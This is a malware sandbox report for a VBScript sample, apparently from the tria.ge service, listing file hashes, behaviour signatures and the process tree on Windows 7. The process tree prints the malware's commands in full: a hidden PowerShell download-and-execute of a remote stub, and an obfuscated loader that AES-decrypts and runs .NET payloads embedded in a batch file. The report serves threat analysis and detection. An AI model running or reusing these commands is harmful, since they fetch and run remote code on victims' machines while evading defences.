Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
09/12/2024, 17:28
Static task
static1
Behavioral task
behavioral1
Sample
9273_output.vbs
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
9273_output.vbs
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
9273_output.vbs
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral4
Sample
9273_output.vbs
Resource
win11-20241007-en
General
-
Target
9273_output.vbs
-
Size
1.6MB
-
MD5
89444730511dcc04894433ad215e9f02
-
SHA1
8af2c8469f0381666bbdfbb12965c48290ef817b
-
SHA256
7bfbcbf1a30ba537264e189e39b2ada434fc451c99a7fe680aa6196cd931b625
-
SHA512
121bcab2c0e4c0c307565742f03d4ebef33ba677f4591a2d95238c500c82fbeafd4d52521bdf57e0775178b081a95b877b561721ec72540b0beb4acf3548a19f
-
SSDEEP
24576:prCPrx+7wnggpUvK3oVj1S1LYuhN0E7olLXm5ttA7AhazaJUelDBY1Qq0+BbUklh:g/rUTV40u3oli5LEgaaUKat0+BbeYz
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1824 powershell.exe 1256 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1256 powershell.exe 1824 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1256 powershell.exe Token: SeDebugPrivilege 1824 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1980 wrote to memory of 1932 1980 WScript.exe 30 PID 1980 wrote to memory of 1932 1980 WScript.exe 30 PID 1980 wrote to memory of 1932 1980 WScript.exe 30 PID 1932 wrote to memory of 1256 1932 cmd.exe 32 PID 1932 wrote to memory of 1256 1932 cmd.exe 32 PID 1932 wrote to memory of 1256 1932 cmd.exe 32 PID 1980 wrote to memory of 2756 1980 WScript.exe 34 PID 1980 wrote to memory of 2756 1980 WScript.exe 34 PID 1980 wrote to memory of 2756 1980 WScript.exe 34 PID 2756 wrote to memory of 1824 2756 cmd.exe 36 PID 2756 wrote to memory of 1824 2756 cmd.exe 36 PID 2756 wrote to memory of 1824 2756 cmd.exe 36
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9273_output.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"2⤵
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1256
-
-
-
C:\Windows\System32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r+bFNsKWcrMhhN0VNqHyPpVzm490/5Y+urqm0SsiN9g='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QFHft5W2NiDlaGOW8LKzjw=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1824
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.6MB
MD563a0d558702bb4b4fdad3fbe2ffc0ac9
SHA1c70f2444e8052e6495c42f179785da267acac50b
SHA256c3c8a913470c637c51bc84cdaaf8eb23f52556ad289d57c79e9c9cfa7bf9f757
SHA5127f7819c86ac7a74694dc77b21cb54ccbfc084d98554d880323ba460dc033492718f052041f001837c5412af52aa0c29a8a30125f8413276201643d516e052f10
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD53e1eefd04a30f99176dda02c61cad12a
SHA14af7b314f64569d47aef48924b6f4d6cb332a656
SHA256d9a0df80551338b49dfb5d0ec16db0dcaac68f80e81f5db17777ae643a4eb3e8
SHA5122eea974192ed27f918db033ab704233ec094f2d94b6633a1663aecfad0045d752145194280bd318fa2cfda157eacbc272eea3e41b85feaef57066abd40a27f61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UP5INLH8OZG4ZOAPQMTI.temp
Filesize7KB
MD5673fdbcaebd183256af7a23aa2752664
SHA1dca10dd769cc88081b40113352782c2348644ea3
SHA2561c53589477bbff7de9d1d27159aa2261a20474938b34f9fd9f33a03f8c974fed
SHA5123b6f737135994918ad8711d0fd0f0e95c8d5c4de6dfa3e6a4e56b51f9bb502d43db6e983b5eeeb8351c68540a3381fc8b6c5f2cd416e6b014183aebeb27fb08e